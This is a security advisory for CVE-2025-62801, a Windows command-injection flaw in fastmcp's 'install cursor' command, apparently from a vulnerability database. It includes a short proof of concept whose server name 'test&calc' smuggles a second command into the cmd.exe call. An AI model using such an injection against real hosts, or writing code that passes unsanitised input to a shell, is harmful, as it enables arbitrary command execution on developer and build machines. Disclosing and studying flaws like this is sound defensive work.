CVE-2025-62801

Summary

A command-injection vulnerability lets any attacker who can influence the server_name field of an MCP execute arbitrary OS commands on Windows hosts that run fastmcp install cursor

Details

generate_cursor_deeplink(server_name, …) embeds server_name verbatim in a cursor://…?name= query string.
open_deeplink() is invoked with shell=True only on Windows. That calls cmd.exe /c start <deeplink>.
Any cmd metacharacter inside server_name (&, |, >, ^, …) escapes the start command and spawns an attacker-chosen process.

PoC

server.py


import random
from fastmcp import FastMCP

mcp = FastMCP(name=&quot;test&amp;calc&quot;)

@mcp.tool
def roll_dice(n_dice: int) -&gt; list[int]:
    &quot;&quot;&quot;Roll `n_dice` 6-sided dice and return the results.&quot;&quot;&quot;
    return [random.randint(1, 6) for _ in range(n_dice)]

if __name__ == &quot;__main__&quot;:
    mcp.run()

then run in the terminal: fastmcp install cursor server.py

Impact

OS Command / Shell Injection (CWE-78) Every Windows host that runs fastmcp install cursor is at risk. Developers on their local workstations, CI/CD agents and corporate build machines alike.

Published: Oct 29, 2025
Updated: Oct 30, 2025
CVE: CVE-2025-62801
GHSA: GHSA-rj5c-58rq-j5g5
Severity: Medium
Exploit:

No technical information available.

CWEs:

CWE-78

OWASP TOP 10:

A1 - Injection

Affected Software
References

Software	From	Fixed in
fastmcp	-	2.13.0

https://github.com/jlowin/fastmcp/security/advisories/GHSA-rj5c-58rq-j5g5

Vulnerability Database

CVE-2025-62801

Summary

Details

PoC

Impact

Deep Security Visibility Without the Complexity